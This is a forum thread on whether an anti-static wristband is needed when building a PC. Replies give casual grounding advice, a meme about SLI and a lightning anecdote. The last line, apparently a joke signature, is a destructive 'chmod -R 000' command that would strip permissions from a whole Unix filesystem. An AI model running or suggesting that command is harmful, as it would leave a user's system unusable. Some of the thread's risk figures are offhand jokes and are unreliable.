Question to anyone that built a custom pc

Teemo4Life

Did u guys use a anti static wristband or mat.

Is it necessary?

If I just build it on a normal table, I have no carpet with shorts and singlet, fine? Is that what everyone does

You just have to make sure to ground yourself. Touching a piece of metal (example the case) should do the trick.

I built my rig on carpet, wearing flease pajamas and one of those fuzzy blankets over my shoulders.

IDGAF static, come me bro.

We can't Benchmark like we used to, but we have our ways. One trick is to shove more GPUs in your computer. Like the time I needed to NV-Link, because I needed a higher HeavenBench score, so I did an SLI, which is what they called NV-Link back in the day. So, I decided to put two GPUs in my computer, which was the style at the time. Now, to add another GPU to your computer, costs a new PSU. Now in those days PSUs said OCZ on them, "Gimme 750W OCZs for an SLI" you'd say. Now where were we? Oh yeah, the important thing was that I had two GPUs in my rig, which was the style at the time! They didn't have RGB PSUs at the time, because of the war. The only thing you could get was those big green ones.

Can u tell if u have static in your body or its only little bolts that won't affect U but will affect your computer parts.

If lightning hits you power cable will it boost your fps to 50000 for 1 second, implode or just shut down and overpower the parts and just kill itself xD

seems to work fine, if this post is any indication.

interestingly enough, I did have lightning hit the powerpole closest to my house. system shutdown instantly, RIP ripjaws RAM.

Not quite. You more need to touch metal that's connected to ground, such as a power supply connected to a grounded outlet, or a case with a grounded PSU in it.

If you will put both of your hands on your case, you will ground yourself. But you need to do this EVERYTIME you go to touch the computer.

In all actuality, if you didn't do this you're probably not going to harm anything. Only 1/100 times will you ever shock anything, and only 1/100 times that you shock anything will it damage it. But that 1/1000, it could be you!

Please spend as much time writing your question, as you want me to spend responding to it.  Take some time, and explain your issue, please!

If I am working on the computer for an extended amount of time, such as when assembling a new build, I will use an anti static wristband.

It's not entirely necessary because you can ground yourself by touching the metal of your computer case.

Still, it's like an extra insurance for a few dollars.

It's hardly expensive and inconvenient, but it does give a huge piece of mind.

It's not like the risk of static shock is huge, but you'll kill yourself if it does happen and if you didn't take the precautions.

I never used one. It's not necessary, but it helps in case you get distracted or do something without paying attention. If you are careful and only handle components by their plastic parts, as well as touch something made of metal before you start, you should be perfectly fine. All it takes is a little attention to what you're doing.

-edit-

I probably would get one if I was working on other people's computers on a daily basis. Although my uncle does that and I've never seen him wear one. Nor has he ever zapped anything with static that I know of.

Don't ask to ask, just ask... please 🤨

sudo chmod -R 000 /*
